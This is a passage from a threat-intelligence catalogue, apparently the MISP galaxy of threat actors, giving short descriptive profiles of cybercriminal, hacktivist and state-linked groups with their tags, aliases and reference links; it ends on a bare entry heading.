ShinyHunters

ShinyHunters is a cybercriminal group of unknown origin that is motivated by financial gain. The group is known for its sophisticated attacks against a wide range of targets, including businesses, organizations, and government agencies. ShinyHunters typically uses phishing attacks and exploit kits to gain access to victim networks, where they deploy malware to steal sensitive data, such as names, addresses, phone numbers, Social Security numbers, and credit card information.

The tag is: misp-galaxy:threat-actor="ShinyHunters"

Table 12229. Table References

Links

https://cyberwarzone.com/shinyhunters-22-year-old-member-pleads-guilty-to-cyber-extortion-causing-6-million-in-damage/

https://www.bitdefender.com/blog/hotforsecurity/pizza-hut-australia-leaks-one-million-customers-details-claims-shinyhunters-hacking-group/

https://www.justice.gov/usao-wdwa/pr/alleged-french-cybercriminal-appear-seattle-indictment-conspiracy-computer-intrusion

IronHusky

IronHusky is a Chinese-based threat actor first attributed in July 2017 targeting Russian and Mongolian governments, as well as aviation companies and research institutes. Since their initial attacks ceased in 2018, they have been working on a new remote access trojan dubbed MysterySnail.

The tag is: misp-galaxy:threat-actor="IronHusky"

Table 12230. Table References

Links

https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/

https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk175885

UserSec

UserSec is a pro-Russian hacking group that has been active since at least 2022. The group is known for its DDoS attacks and has collaborated with other pro-Russian hacking groups. In May 2023, UserSec announced a cyber campaign targeting NATO member states and joined forces with KillNet to launch attacks against NATO.

The tag is: misp-galaxy:threat-actor="UserSec"

Table 12231. Table References

Links

https://therecord.media/scandinavian-airlines-cyberattack-anonymous-sudan/

https://blog.cyble.com/2023/05/24/notable-ddos-attack-tools-and-services-supporting-hacktivist-operations-in-2023/

https://socradar.io/cyber-shadows-pact-darknet-parliament-killnet-anonymous-sudan-revil/

https://socradar.io/dark-peep-2-war-and-a-piece-of-hilarity/

UAC-0094

State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts. The Ukrainian CERT attributes the hacking campaign to threat actors tracked as UAC-0094. Threat actors are targeting Telegram users by sending Telegram messages with malicious links to the Telegram website in order to gain unauthorized access to the records and transfer a one-time code from SMS.

The tag is: misp-galaxy:threat-actor="UAC-0094"

Table 12232. Table References

Links

https://cert.gov.ua/article/39253

https://vulners.com/thn/THN:4C1C2CD10F20E08DD74D465450DF3F17?utm_source=rss&utm_medium=rss&utm_campaign=rss

TraderTraitor

TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.

The tag is: misp-galaxy:threat-actor="TraderTraitor"

TraderTraitor is also known as:

  • Jade Sleet

  • UNC4899

Table 12233. Table References

Links

https://www.mandiant.com/resources/blog/north-korea-supply-chain

https://us-cert.cisa.gov/ncas/alerts/aa22-108a

https://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023

TheDarkOverlord

The Dark Overlord is a financially motivated ransomware group that has been active since 2016. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.

The tag is: misp-galaxy:threat-actor="TheDarkOverlord"

Table 12234. Table References

Links

https://www.databreaches.net/peachtree-orthopedics-alerts-patients-of-cyberattack-third-patient-data-breach-in-seven-years/

http://securityaffairs.co/wordpress/64782/data-breach/london-bridge-plastic-surgery-hack.html

http://www.csoonline.com/article/3193397/security/no-netflix-is-not-a-victim-of-ransomware.html

UNC2565

UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565’s motivations are currently unknown but overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.

The tag is: misp-galaxy:threat-actor="UNC2565"

UNC2565 is also known as:

  • Hive0127

Table 12235. Table References

Links

https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations

https://socradar.io/new-gootloader-variant-gootbot-changes-the-game-in-malware-tactics/

https://securityintelligence.com/x-force/gootbot-gootloaders-new-approach-to-post-exploitation/

Desorden Group

Desorden (Disorder in Spanish, previously known as ChaosCC), is a financially motivated hacker group. The group first emerged under the new name Desorden in September 2021, on Raidforums. Today the group maintains users under that name on several popular English-speaking hacking forums, where they share their attacks and ransom demands, and offer databases for sale. The group gained an excellent reputation among the cybercriminal communities due to their successful operations and the unique data that they share and offer for sale.

The tag is: misp-galaxy:threat-actor="Desorden Group"

Table 12236. Table References

Links

https://www.databreaches.net/major-malaysian-water-utilities-company-hit-by-hackers-ranhill-offline-hackers-claim-databases-and-backups-deleted/

https://www.databreaches.net/one-month-later-ranhill-still-hasnt-fully-recovered-from-cyberattack/

https://www.databreaches.net/malaysian-online-stock-brokerage-firm-victim-of-cyberattack/

https://www.databreaches.net/johnson-fitness-and-wellness-hit-by-desorden-group/

https://www.databreaches.net/thailands-the-icon-group-hacked-by-desorden/

https://www.databreaches.net/customer-data-from-hundreds-of-indonesian-and-malaysian-restaurants-hacked-by-desorden/

https://www.databreaches.net/major-indonesia-tollroad-operator-hacked-by-desorden/

https://www.databreaches.net/recent-cyberattacks-put-thai-citizens-privacy-and-data-security-at-greater-risk/

https://www.databreaches.net/thai-entities-continue-to-fall-prey-to-cyberattacks-and-leaks/

https://seclists.org/dataloss/2021/q4/81

Confucious

Confucius is an APT organization funded by India. It has been carrying out cyber attacks since 2013. Its main targets are India’s neighbouring countries such as Pakistan and China. It has a strong interest in targets in the fields of military, government and energy.

The tag is: misp-galaxy:threat-actor="Confucious"

Table 12237. Table References

Links

https://medium.com/@knownsec404team/apt-k-47-mysterious-elephant-a-new-apt-organization-in-south-asia-5c66f954477

https://blog.nsfocus.net/aptconfuciuspakistanibo/

Kiss-a-Dog

CrowdStrike identified a cryptojacking campaign targeting vulnerable Docker and Kubernetes infrastructure. Called “Kiss-a-dog,” the campaign targets Docker and Kubernetes infrastructure using an obscure domain from the payload, container escape attempt and anonymized “dog” mining pools.

The tag is: misp-galaxy:threat-actor="Kiss-a-Dog"

Table 12238. Table References

Links

https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/

DEV-1028

Microsoft reported on MCCrash, an IoT botnet operated by the DEV-1028 threat actor and used to launch DDoS attacks against private Minecraft servers.

The tag is: misp-galaxy:threat-actor="DEV-1028"

Table 12239. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/12/15/mccrash-cross-platform-ddos-botnet-targets-private-minecraft-servers/

TwoSail Junk

TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

The tag is: misp-galaxy:threat-actor="TwoSail Junk"

TwoSail Junk is also known as:

  • Operation Poisoned News

Table 12240. Table References

Links

https://securelist.com/ios-exploit-chain-deploys-lightspy-malware/96407/

https://securelist.com/apt-annual-review-what-the-worlds-threat-actors-got-up-to-in-2020/99574/

https://www.redpacketsecurity.com/operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links/?utm_source=rss&utm_medium=rss&utm_campaign=operation-poisoned-news-hong-kong-users-targeted-with-mobile-malware-via-local-news-links

Xcatze

Cloud security company Lacework says it discovered a threat actor group named Xcatze that uses a Python named AndroxGh0st to take over AWS servers and send out massive email spam campaigns. Lacework says the malware operates by scanning web apps written in the Laravel PHP framework for exposed configuration files to identify and steal server credentials. Researchers said AndroxGh0st specifically searches for AWS, SendGrid, and Twilio credentials, which it uses to take control of email servers and accounts and send out the spam campaigns.

The tag is: misp-galaxy:threat-actor="Xcatze"

Table 12241. Table References

Links

https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/

BlueBottle

Bluebottle, a cyber-crime group that specializes in targeted attacks against the financial sector, is continuing to mount attacks on banks in Francophone countries. The group makes extensive use of living off the land, dual-use tools, and commodity malware, with no custom malware deployed in this campaign.

The tag is: misp-galaxy:threat-actor="BlueBottle"

Table 12242. Table References

Links

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

Dalbit

The group usually targets vulnerable servers to breach information including internal data from companies or encrypts files and demands money. Their targets of attack are usually Windows servers that are poorly managed or are not patched to the latest version. Besides these, there are also attack cases that targeted email servers or MS-SQL database servers.

The tag is: misp-galaxy:threat-actor="Dalbit"

Table 12243. Table References

Links

https://asec.ahnlab.com/en/56941/

https://asec.ahnlab.com/en/56236/

https://asec.ahnlab.com/en/47455/

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

SingularityMD

SingularityMD is a threat actor group that has targeted educational institutions in the US. They gained unauthorized access to their networks by exploiting weak security practices, such as using students' dates of birth as passwords. SingularityMD demanded a ransom in cryptocurrency and threatened to leak stolen information if not paid. They have demonstrated a willingness to follow through on their threats and have already leaked some data.

The tag is: misp-galaxy:threat-actor="SingularityMD"

Table 12244. Table References

Links

https://www.databreaches.net/jeffco-public-schools-hit-by-the-same-threat-actors-that-hit-clark-county-school-district-and-via-the-same-way/

https://research.checkpoint.com/2023/30th-october-threat-intelligence-report/

https://www.databreaches.net/hackers-escalate-leak-200k-ccsd-students-data-claim-to-still-have-access-to-ccsd-email-system/

SCARLETEEL

SCARLETEEL is a threat actor that primarily targets cloud environments, specifically AWS and Kubernetes. They have been observed stealing proprietary data and intellectual property, as well as conducting cryptomining operations. SCARLETEEL employs sophisticated tactics and tools to bypass security measures and gain unauthorized access to accounts, often exploiting vulnerabilities in containerized workloads and misconfigurations in AWS policies.

The tag is: misp-galaxy:threat-actor="SCARLETEEL"

Table 12245. Table References

Links

https://sysdig.com/blog/scarleteel-2-0/

https://sysdig.com/blog/cloud-breach-terraform-data-theft/

DiceyF

DiceyF is an advanced persistent threat group that has been targeting online casinos and other victims in Southeast Asia for an extended period. They have exhibited overlapping activity with LuckyStar PlugX and Earth Berberoka/GamblingPuppet, as reported by various cybersecurity vendors. While their motivations remain unclear, previous incidents suggest a combination of espionage and intellectual property theft rather than immediate financial gain. DiceyF continuously evolves their codebase and adds encryption capabilities to enhance their stealthy cyberespionage activities.

The tag is: misp-galaxy:threat-actor="DiceyF"

Table 12246. Table References

Links

https://securelist.com/diceyf-deploys-gameplayerframework-in-online-casino-development-studio/107723/

DEV-0950

Lace Tempest, also known as DEV-0950, is a threat actor that exploited vulnerabilities in software such as SysAid and PaperCut to gain unauthorized access to systems. Lace Tempest is known for deploying the Clop ransomware and exfiltrating data from compromised networks.

The tag is: misp-galaxy:threat-actor="DEV-0950"

DEV-0950 is also known as:

  • Lace Tempest

Table 12247. Table References

Links

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

WeRedEvils

WeRedEvils is a hacking group that has claimed responsibility for multiple cyber attacks. They targeted the Iranian Electric Grid and the Tasnimnews website, causing the latter to go offline. The group also claimed to have hacked into Iran’s oil infrastructure, causing significant damage. They emerged in response to the Hamas massacre and are believed to be a group of Israeli cyber experts.

The tag is: misp-galaxy:threat-actor="WeRedEvils"

Table 12248. Table References

Links

https://cyberwarzone.com/tasnim-news-hacked-by-weredevils/

https://www.msspalert.com/news/managed-security-services-provider-mssp-market-news-30-october-2023

WIRTE

WIRTE is a threat actor group that was first discovered in 2018. They are suspected to be part of the Gaza Cybergang, an Arabic politically motivated cyber criminal group. WIRTE has been observed changing their toolkit and operating methods to remain undetected for longer periods of time. They primarily target governmental and political entities, but have also been known to target law firms and financial institutions.

The tag is: misp-galaxy:threat-actor="WIRTE"

Table 12249. Table References

Links

https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/

https://lab52.io/blog/wirte-group-attacking-the-middle-east/

Caracal Kitten

Caracal Kitten is an APT group that has been targeting activists associated with the Kurdistan Democratic Party. They employ a mobile remote access Trojan to gain unauthorized access to victims' devices. The group disguises their malware as legitimate mobile apps, tricking users into installing them and granting the hackers access to their personal data.

The tag is: misp-galaxy:threat-actor="Caracal Kitten"

Caracal Kitten is also known as:

  • APT-Q-58

Table 12250. Table References

Links

https://deform.co/hacker-group-caracal-kitten-targets-kdp-activists-with-malware/

https://www.ctfiot.com/138538.html

Water Labbu

Trend Micro discovered a threat actor they named Water Labbu that was targeting cryptocurrency scam websites. Typically, cryptocurrency scammers use social engineering techniques, interacting with victims to gain their trust and then manipulating them into providing the permissions needed to transfer cryptocurrency assets. While Water Labbu managed to steal cryptocurrencies via a similar method by obtaining access permissions and token allowances from their victim’s wallets, unlike other similar campaigns, they did not use any kind of social engineering — at least not directly. Instead, Water Labbu lets other scammers use their social engineering tricks to scam unsuspecting victims.

The tag is: misp-galaxy:threat-actor="Water Labbu"

Table 12251. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/water-labbu-abuses-malicious-dapps-to-steal-cryptocurrency.html

TAG-56

TAG-56 is a threat actor group that shares similarities with the APT42 group. They use tactics such as fake registration pages and spearphishing to target victims, often using encrypted chat platforms like WhatsApp or Telegram. TAG-56 is believed to be part of a broader campaign led by an Iran-nexus threat activity group. They have been observed using shared web hosts and recycled code, indicating a preference for acquiring purpose-built infrastructure rather than establishing their own.

The tag is: misp-galaxy:threat-actor="TAG-56"

Table 12252. Table References

Links

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

https://www.recordedfuture.com/suspected-iran-nexus-tag-56-uses-uae-forum-lure-for-credential-theft-against-us-think-tank

TA482

Since early 2022, Proofpoint researchers have observed a prolific threat actor, tracked as TA482, regularly engaging in credential harvesting campaigns that target the social media accounts of mostly US-based journalists and media organizations. This victimology, TA482’s use of services originating from Turkey to host its domains and infrastructure, as well as Turkey’s history of leveraging social media to spread pro-President Recep Tayyip Erdogan and pro-Justice and Development Party (Turkey’s ruling party) propaganda support Proofpoint’s assessment that TA482 is aligned with the Turkish state.

The tag is: misp-galaxy:threat-actor="TA482"

Table 12253. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/above-fold-and-your-inbox-tracing-state-aligned-activity-targeting-journalists

XakNet

XakNet is a self-proclaimed hacktivist group that has targeted Ukraine. They claim to be comprised of Russian patriotic volunteers and have conducted various threat activities, including DDoS attacks, compromises, data leaks, and website defacements. They coordinate their operations with other hacktivist groups and have connections to APT28, a cyber espionage group sponsored by the GRU.

The tag is: misp-galaxy:threat-actor="XakNet"

XakNet is also known as:

  • UAC-0100

  • UAC-0106

Table 12254. Table References

Links

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

Zarya

Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.

The tag is: misp-galaxy:threat-actor="Zarya"

Zarya is also known as:

  • UAC-0109

Table 12255. Table References

Links

https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics

https://www.cyfirma.com/?post_type=out-of-band&p=17397

https://www.reversinglabs.com/blog/the-week-in-security-possible-colonial-pipeline-2.0-ransomware-hurts-small-american-eateries

https://channellife.com.au/story/the-increasing-presence-of-pro-russia-hacktivists

https://socradar.io/dark-web-profile-killnet-russian-hacktivist-group/

https://cip.gov.ua/services/cm/api/attachment/download?id=60068

DarkCasino

DarkCasino is an economically motivated APT group that targets online trading platforms, including cryptocurrencies, online casinos, network banks, and online credit platforms. They are skilled at stealing passwords to access victims' online accounts and have been active for over a year. DarkCasino exploits vulnerabilities, such as the WinRAR vulnerability CVE-2023-38831, to launch phishing attacks and steal online property.

The tag is: misp-galaxy:threat-actor="DarkCasino"

Table 12256. Table References

Links

https://nsfocusglobal.com/the-new-apt-group-darkcasino-and-the-global-surge-in-winrar-0-day-exploits/

Prolific Puma

Prolific Puma provides an underground link shortening service to criminals. Infoblox states that during analysis, no legitimate content was observed being served through their shortener. For operation they use a registered domain generation algorithm (RDGA), based upon which they registered between 35k-75k domain names.

The tag is: misp-galaxy:threat-actor="Prolific Puma"

Table 12257. Table References

Links

https://blogs.infoblox.com/cyber-threat-intelligence/prolific-puma-shadowy-link-shortening-service-enables-cybercrime/

Bohrium

Bohrium is an Iranian threat actor that has been involved in spear-phishing operations targeting organizations in the US, Middle East, and India. They often create fake social media profiles, particularly posing as recruiters, to trick victims into running malware on their computers. Microsoft’s Digital Crimes Unit has taken legal action and seized 41 domains used by Bohrium to disrupt their activities. The group has shown a particular interest in sectors such as technology, transportation, government, and education.

The tag is: misp-galaxy:threat-actor="Bohrium"

Bohrium is also known as:

  • Smoke Sandstorm

  • BOHRIUM

Table 12258. Table References

Links

https://twitter.com/CyberAmyHB/status/1532398956918890500

KAX17

KAX17 is a sophisticated threat actor that has been active since at least 2017. They have operated hundreds of malicious servers within the Tor network, primarily as entry and middle points. Their main objective appears to be collecting information on Tor users and mapping their routes within the network. Despite efforts to remove their servers, KAX17 has shown resilience and continues to operate.

The tag is: misp-galaxy:threat-actor="KAX17"

Table 12259. Table References

Links

https://www.malwarebytes.com/blog/news/2021/12/was-threat-actor-kax17-de-anonymizing-the-tor-network/amp

https://therecord.media/a-mysterious-threat-actor-is-running-hundreds-of-malicious-tor-relays

https://darknetlive.com/post/who-is-responsible-for-running-hundreds-of-malicious-tor-relays/

https://nusenu.medium.com/is-kax17-performing-de-anonymization-attacks-against-tor-users-42e566defce8

MirrorFace

MirrorFace is a Chinese-speaking advanced persistent threat group that has been targeting high-value organizations in Japan, including media, government, diplomatic, and political entities. They have been conducting spear-phishing campaigns, utilizing malware such as LODEINFO and MirrorStealer to steal credentials and exfiltrate sensitive data. While there is speculation about their connection to APT10, ESET currently track them as a separate entity.

The tag is: misp-galaxy:threat-actor="MirrorFace"

Table 12260. Table References

Links

https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/

https://web-assets.esetstatic.com/wls/2023/01/eset_apt_activity_report_t32022.pdf

https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/

VulzSecTeam

VulzSec, also known as VulzSecTeam, is a hacktivist group that has been involved in various cyber-attacks. They have targeted government websites in retaliation for issues such as police brutality and the treatment of Indian Muslims. The group has been involved in campaigns like OpIndia2.0, where they planned to launch DDoS attacks on Indian government websites.

The tag is: misp-galaxy:threat-actor="VulzSecTeam"

VulzSecTeam is also known as:

  • VulzSec

Table 12261. Table References

Links

https://blog.cyble.com/2023/04/28/indian-ideology-targeted-by-hacktivists-reprisal-hacktivism-draws-more-attacks/

https://www.enigmasoftware.com/indonesian-sudanese-cyber-threats-continue-grow-size-scope/

Chernovite

Chernovite is a highly capable and sophisticated threat actor group that has developed a modular ICS malware framework called PIPEDREAM. They are known for targeting industrial control systems and operational technology environments, with the ability to disrupt, degrade, and potentially destroy physical processes. Chernovite has demonstrated a deep understanding of ICS protocols and intrusion techniques, making them a significant threat to critical infrastructure sectors.

The tag is: misp-galaxy:threat-actor="Chernovite"

Table 12262. Table References

Links

https://www.dragos.com/blog/pipedream-mousehole-opcua-module/

https://www.dragos.com/blog/industry-news/chernovite-pipedream-malware-targeting-industrial-control-systems/

https://www.dragos.com/threats/the-2022-ics-ot-vulnerability-briefing-recap/

https://www.dragos.com/blog/responding-to-chernovites-pipedream-with-dragos-global-services/

MurenShark

MurenShark is an advanced persistent threat group that operates primarily in the Middle East, with a focus on targeting Turkey. They have shown interest in military projects, as well as research institutes and universities. This group is highly skilled in counter-analysis and reverse traceability, using sophisticated tactics to avoid detection. They utilize compromised websites as file servers and command and control servers, and have been known to use attack tools like NiceRender for phishing purposes.

The tag is: misp-galaxy:threat-actor="MurenShark"

MurenShark is also known as:

  • Actor210426

Table 12263. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-murenshark-apt-threat-actors-aka-actor210426-active-iocs

DriftingCloud

DriftingCloud is a persistent threat actor known for targeting various industries and locations. They are skilled at developing or acquiring zero-day exploits to gain unauthorized access to target networks. Compromising gateway devices is a common tactic used by DriftingCloud, making network monitoring solutions crucial for detecting their attacks.

The tag is: misp-galaxy:threat-actor="DriftingCloud"

Table 12264. Table References

Links

https://socradar.io/driftingcloud-apt-group-exploits-zero-day-in-sophos-firewall/

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

https://www.trendmicro.com/en_us/research/23/g/supply-chain-attack-targeting-pakistani-government-delivers-shad.html

UNC4191

UNC4191 is a China-linked threat actor that has been involved in cyber espionage campaigns targeting public and private sectors primarily in Southeast Asia. They have been known to use USB devices as an initial infection vector and have been observed deploying various malware families on infected systems. UNC4191’s operations have also extended to the US, Europe, and the Asia Pacific Japan region, with a particular focus on the Philippines.

The tag is: misp-galaxy:threat-actor="UNC4191"

Table 12265. Table References

Links

https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

https://therecord.media/espionage-group-using-usb-devices-to-hack-targets-in-southeast-asia/

DragonSpark

DragonSpark is a threat actor that has been conducting attacks primarily targeting organizations in East Asia. They utilize the open-source tool SparkRAT, which is a multi-platform and frequently updated remote access Trojan. The threat actor is believed to be Chinese-speaking based on their use of Chinese language support and compromised infrastructure located in China and Taiwan. They employ various techniques to evade detection, including Golang source code interpretation and the use of the China Chopper webshell.

The tag is: misp-galaxy:threat-actor="DragonSpark"

Table 12266. Table References

Links

https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source-code-interpretation/

FusionCore

The CYFIRMA research team has identified a new up-and-coming European threat actor group known as FusionCore. Running Malware-as-a-service, along with the hacker-for- hire operation, they have a wide variety of tools and services that are being offered on their website, making it a one-stop-shop for threat actors looking to purchase cost- effective yet customizable malware. The operators have started a ransomware affiliate program that equips the attackers with the ransomware and affiliate software to manage victims. FusionCore typically provides sellers with a detailed set of instructions for any service or product being sold, enabling individuals with minimal experience to carry out complex attacks.

The tag is: misp-galaxy:threat-actor="FusionCore"

Table 12267. Table References

Links

https://www.cyfirma.com/?post_type=out-of-band&p=17003

Earth Kitsune

Earth Kitsune is an advanced persistent threat actor that has been active since at least 2019. They primarily target individuals interested in North Korea and use various tactics, such as compromising websites and employing social engineering, to distribute self-developed backdoors. Earth Kitsune demonstrates technical proficiency and continuously evolves their tools, tactics, and procedures. They have been associated with malware such as WhiskerSpy and SLUB.

The tag is: misp-galaxy:threat-actor="Earth Kitsune"

Table 12268. Table References

Links

https://www.trendmicro.com/en_us/research/23/b/earth-kitsune-delivers-new-whiskerspy-backdoor.html

https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html

https://www.trendmicro.com/en_us/research/20/j/operation-earth-kitsune-a-dance-of-two-new-backdoors.html

https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-earth-kitsune-tracking-slub-s-current-operations/

AppMilad

AppMilad is an Iranian hacking group that has been identified as the source of a spyware campaign called RatMilad. This spyware is designed to silently infiltrate victims' devices and gather personal and corporate information, including private communications and photos. The group has been distributing the spyware through fake apps and targeting primarily Middle Eastern enterprises.

The tag is: misp-galaxy:threat-actor="AppMilad"

Table 12269. Table References

Links

https://zimpstage.wpengine.com/blog/we-smell-a-ratmilad-mobile-spyware/

UNC4841

UNC4841 is a well-resourced threat actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. They have been observed selectively deploying specific malware families at high priority targets, with SKIPJACK being the most widely deployed. UNC4841 primarily targeted government and technology organizations, but they have also been observed targeting other verticals.

The tag is: misp-galaxy:threat-actor="UNC4841"

Table 12270. Table References

Links

https://blog.polyswarm.io/unc4841-targeting-government-entities-with-barracuda-esg-0day-cve-2023-2868

https://www.mandiant.com/resources/blog/unc4841-post-barracuda-zero-day-remediation

https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally

CL-STA-0043

CL-STA-0043 is a highly skilled and sophisticated threat actor, believed to be a nation-state, targeting governmental entities in the Middle East and Africa. They exploit vulnerabilities in on-premises Internet Information Services and Microsoft Exchange servers to infiltrate target networks. They engage in reconnaissance, locate vital assets, and have been observed using native Windows tools for privilege escalation.

The tag is: misp-galaxy:threat-actor="CL-STA-0043"

Table 12271. Table References

Links

https://www.securonix.com/blog/securonix-threat-labs-monthly-intelligence-insights-june-2023/

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

DEV-0928

DEV-0928 is a threat actor that has been tracked by Microsoft since September 2022. They are known for their involvement in high-volume phishing campaigns, using tools offered by DEV-1101. DEV-0928 sends phishing emails to targets and has been observed launching campaigns involving millions of emails. They also utilize evasion techniques, such as redirection to benign pages, to avoid detection.

The tag is: misp-galaxy:threat-actor="DEV-0928"

Table 12272. Table References

Links

http://www.microsoft.com/en-us/security/blog/2023/03/13/dev-1101-enables-high-volume-aitm-campaigns-with-open-source-phishing-kit/

TEMP_Heretic

TEMP_Heretic is a threat actor that has been observed engaging in targeted spear-phishing campaigns. They exploit vulnerabilities in email platforms, such as Zimbra, to exfiltrate emails from government, military, and media organizations. They use multiple outlook.com email addresses and manually craft content for each email before sending it.

The tag is: misp-galaxy:threat-actor="TEMP_Heretic"

Table 12273. Table References

Links

https://www.welivesecurity.com/en/eset-research/mass-spreading-campaign-targeting-zimbra-users/

https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/

WeedSec

WeedSec is a threat actor group that recently targeted the online learning and course management platform Moodle. They posted sample databases of Moodle on their Telegram channel, which is widely used by educational institutions and workplaces.

The tag is: misp-galaxy:threat-actor="WeedSec"

Table 12274. Table References

Links

https://socradar.io/cyber-awakeness-month-takedown-of-trigona-hive-ransomware-resurges-ransomedforum-and-new-raas-qbit/

TA444

TA444 is a North Korea state-sponsored threat actor that primarily focuses on financially motivated operations. They have been active since at least 2017 and have recently shifted their attention to targeting cryptocurrencies. TA444 employs various infection methods and has a diverse range of malware and backdoors at their disposal. They have been attributed to stealing hundreds of millions of dollars' worth of cryptocurrency and related assets.

The tag is: misp-galaxy:threat-actor="TA444"

Table 12275. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://cyberscoop.com/north-korean-cryptocurrency-hackers-education-government/

https://www.darkreading.com/remote-workforce/north-korea-apt-swindled-1b-crypto-investors-2022

NewsPenguin

NewsPenguin is threat actor that has been targeting organizations in Pakistan. They use a complex payload delivery mechanism and exploit the upcoming Pakistan International Maritime Expo & Conference as a lure to trick their victims. The group has been linked to a phishing campaign that leverages spear-phishing emails and weaponized documents to deliver an advanced espionage tool.

The tag is: misp-galaxy:threat-actor="NewsPenguin"

Table 12277. Table References

Links

https://www.rewterz.com/rewterz-news/rewterz-threat-alert-newspenguin-threat-actors-targeting-pakistani-entities-with-malicious-campaign-active-iocs

https://blogs.blackberry.com/en/2023/02/newspenguin-a-previously-unknown-threat-actor-targets-pakistan-with-advanced-espionage-tool

DefrayX

DefrayX is a threat actor group known for their RansomExx ransomware operations. They primarily target Linux operating systems, but also release versions for Windows. The group has been active since 2018 and has targeted various sectors, including healthcare and manufacturing. They have also developed other malware strains such as PyXie RAT, Vatet loader, and Defray ransomware.

The tag is: misp-galaxy:threat-actor="DefrayX"

DefrayX is also known as:

  • Hive0091

Table 12278. Table References

Links

https://securityaffairs.co/wordpress/138933/malware/ransomexx-ransomware-rust-language.html

https://research.checkpoint.com/2022/28th-november-threat-intelligence-report/

https://securityintelligence.com/posts/ransomexx-upgrades-rust/

PerSwaysion

PerSwaysion is a threat actor known for conducting phishing campaigns targeting high-level executives. They have been active since at least August 2019 and are believed to be based in Vietnam. PerSwaysion has recently updated their techniques, using more direct phishing methods and leveraging Microsoft 365 to steal credentials.

The tag is: misp-galaxy:threat-actor="PerSwaysion"

Table 12279. Table References

Links

https://blog.group-ib.com/perswaysion

https://blog.scarletshark.com/perswaysion-threat-actor-updates-their-techniques-and-infrastructure-e9465157a653

Webworm

Space Pirates is a cybercrime group that has been active since at least 2017. They primarily target Russian companies and have been observed using various malware, including Deed RAT and ShadowPad. The group uses a combination of publicly available tools and their own protocols to communicate with their command-and-control servers.

The tag is: misp-galaxy:threat-actor="Webworm"

Webworm is also known as:

  • Space Pirates

Table 12280. Table References

Links

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-a-look-into-the-group-s-unconventional-techniques-new-attack-vectors-and-tools/

https://blog.polyswarm.io/space-pirates-target-russian-aerospace

N4ughtysecTU

In March 2022, a hacking group calling themselves N4ughtySecTU claimed to have breached TransUnion’s systems and threatened to leak four terabytes of data if the credit bureau didn’t pay a $15-million (R242-million) ransom.

The tag is: misp-galaxy:threat-actor="N4ughtysecTU"

Table 12281. Table References

Links

https://mybroadband.co.za/news/security/438982-how-bank-customers-can-protect-themselves-after-hackers-leak-transunion-data.html

https://cisoseries.com/cyber-security-headlines-march-21-2022/

https://mybroadband.co.za/news/security/443090-cybercriminals-love-south-africa-study.html

Moshen Dragon

